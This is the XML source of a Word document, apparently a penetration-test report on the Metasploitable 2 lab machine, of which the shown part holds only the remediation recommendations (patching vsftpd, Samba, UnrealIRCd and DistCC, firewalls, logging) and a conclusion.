    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="61F06461" wp14:textId="028DE731">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="5C1A94B6" wp14:textId="0BF556C2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Based on industry best practices (NIST SP 800-53, OWASP Top 10), the following recommendations are made:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="750C82D0" wp14:textId="40985C0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Patch and Update Software:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="22B5E696" wp14:textId="70BEBE87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Replace vsftpd 2.3.4 with a secure version.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="01158C77" wp14:textId="76EB5FCD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Upgrade Samba, UnrealIRCd, and DistCC.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0BF53779" wp14:textId="313D1C6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Remove Unnecessary Services:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2DA68BDD" wp14:textId="4DBE1EED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Disable services not required for operations (e.g., IRC, DistCC).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="6EFFECBC" wp14:textId="235A9C5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Strong Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="45CDB097" wp14:textId="5E5844EF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Enforce complex passwords and remove default credentials.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0AF289D4" wp14:textId="5426C9C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Firewall and Access Controls:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="27DCA1FA" wp14:textId="7DDA5A17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Restrict access to only necessary ports.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="0DCFB170" wp14:textId="38A37E09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Use host-based firewalls and segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="1C70759B" wp14:textId="645F25C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Application Security:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="185F1680" wp14:textId="066CA37C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Apply input validation and sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="51058F9D" wp14:textId="6A17FEB9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Deploy a Web Application Firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4C749098" wp14:textId="61602DE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and Logging:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="24AC8AE7" wp14:textId="2BE585A0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Implement intrusion detection systems.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="18ED5763" wp14:textId="54657DD2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Regularly monitor logs for suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="56F4B3B6" wp14:textId="2734924B"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="01751763" wp14:textId="672B19E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="3067E3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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="75938C59" wp14:textId="2E5F45D1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This penetration test successfully demonstrated how multiple high-risk vulnerabilities in Metasploitable 2 can be exploited to gain full control of the system.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2EEB53FE" wp14:textId="35918D3F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The vulnerabilities identified (vsftpd, Samba, UnrealIRCd, DistCC, and web applications) highlight common issues that occur in real-world environments when systems are not patched or secured.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="2B59D2E2" wp14:textId="797912FD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>If this were a production system, attackers could exfiltrate sensitive data, install malware, or pivot to other machines on the network.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="4F5C3018" wp14:textId="120CF69C">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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key takeaway is that </w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="3067E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vulnerability assessments and penetration testing are essential</w:t>
      </w:r>
      <w:r w:rsidRPr="22B3D3A9" w:rsidR="3067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maintain security. Applying patches, enforcing strong access controls, and following security best practices significantly reduce the risk of compromise</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="22B3D3A9" wp14:paraId="24563673" wp14:textId="4E7B378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2B3D3A9" wp14:paraId="048009BB" wp14:textId="30B1508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072749B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8db4e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229f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7d5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92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77f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27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db1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ca5d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c9fb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c54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244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69e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5a4b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CBCCD"/>
    <w:rsid w:val="0F3631D8"/>
    <w:rsid w:val="11A8F8D4"/>
    <w:rsid w:val="22B3D3A9"/>
    <w:rsid w:val="2A295179"/>
    <w:rsid w:val="3067E39F"/>
    <w:rsid w:val="31BA5CA1"/>
    <w:rsid w:val="463DD048"/>
    <w:rsid w:val="492CBCCD"/>
    <w:rsid w:val="5E14408F"/>
    <w:rsid w:val="63A8ABB1"/>
    <w:rsid w:val="65DA1767"/>
    <w:rsid w:val="6F2058E8"/>
    <w:rsid w:val="752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BCCD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{62CCA972-B035-497A-B3F9-A8016EF2A7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B3D3A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8a55ee40d2e44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2025-08-20T19:01:56.2931787Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-20T19:10:53.8309718Z</dcterms:modified>
  <dc:creator>keerthana vikneswaran</dc:creator>
  <lastModifiedBy>keerthana vikneswaran</lastModifiedBy>
</coreProperties>
</file>